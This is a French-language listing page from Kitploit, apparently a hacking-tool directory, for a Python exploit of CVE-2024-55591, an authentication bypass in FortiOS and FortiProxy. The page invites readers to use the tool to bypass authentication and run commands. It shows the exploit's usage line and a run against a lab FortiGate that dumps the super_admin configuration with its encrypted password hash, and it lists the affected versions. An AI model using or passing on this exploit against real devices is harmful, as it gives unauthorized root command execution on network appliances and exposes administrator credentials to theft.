Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
fortios-auth-bypass-exploit-CVE-2024-55591 — # Exploit Python pour CVE-2024-55591, contournant l'authentification FortiOS pour exécuter des commandes à distance sur les appareils FortiGate et FortiProxy vulnérables. | Kitploit
Outils/GitHubGitHub/sysirq/fortios-auth-bypass-exploit-cve-2024-55591
Authentification et AutorisationAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubsysirq/fortios-auth-bypass-exploit-cve-2024-55591

fortios-auth-bypass-exploit-CVE-2024-55591

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

# Exploit Python pour CVE-2024-55591, contournant l'authentification FortiOS pour exécuter des commandes à distance sur les appareils FortiGate et FortiProxy vulnérables.

Voir le dépôt
34il y a 1 anPas encore vérifié
Partager

CVE-2024-55591

Un exploit de contournement d'authentification Fortinet FortiOS

Description

Utilisez cet exploit pour contourner l'authentification et exécuter des commandes.

Usage

root@kitploit:~
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py 
usage: exp.py [-h] --target TARGET [--port PORT] [--username USERNAME] [--cmd CMD]
exp.py: error: the following arguments are required: --target/-t

Démo

image-20250122220404985

image-20250122220502121

image-20250122220502121

Sortie

root@kitploit:~
sysirq@sysirq-machine:~/Work/Fortinet/FortiGate_7_0_16/CVE-2024-55591$ python3 exp.py -t 192.168.182.188 -p 443 -u admin -c 'show system admin'
CLI websocket initialized
\x00l_Process_Access" "Local_Process_Access" "root" "" ""  \x08"none" [192.168.182.1]:35950 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM # 
wait for next action
CLI websocket initialized
\x00_Process_Access" "Local_Process_Access" "root" "" ""  \x08"none" [192.168.182.1]:40050 [192.168.182.188]:443
Unknown action 0

FortiGate-VM64-KVM # 
wait for next action
CLI websocket initialized
\x00 system admin
config system admin
    edit "admin"
        set accprofile "super_admin"
        set vdom "root"
        set password ENC SH2brnbwbooMvuSyHfEe82/cs0ehaIB2Kf06G/QYlI67PLGoEVKGJCGbYGqItg=
    next
end

Versions concernées

  • FortiOS 7.0.0 à 7.0.16
  • FortiProxy 7.0.0 à 7.0.19
  • FortiProxy 7.2.0 à 7.2.12
Télécharger l’outil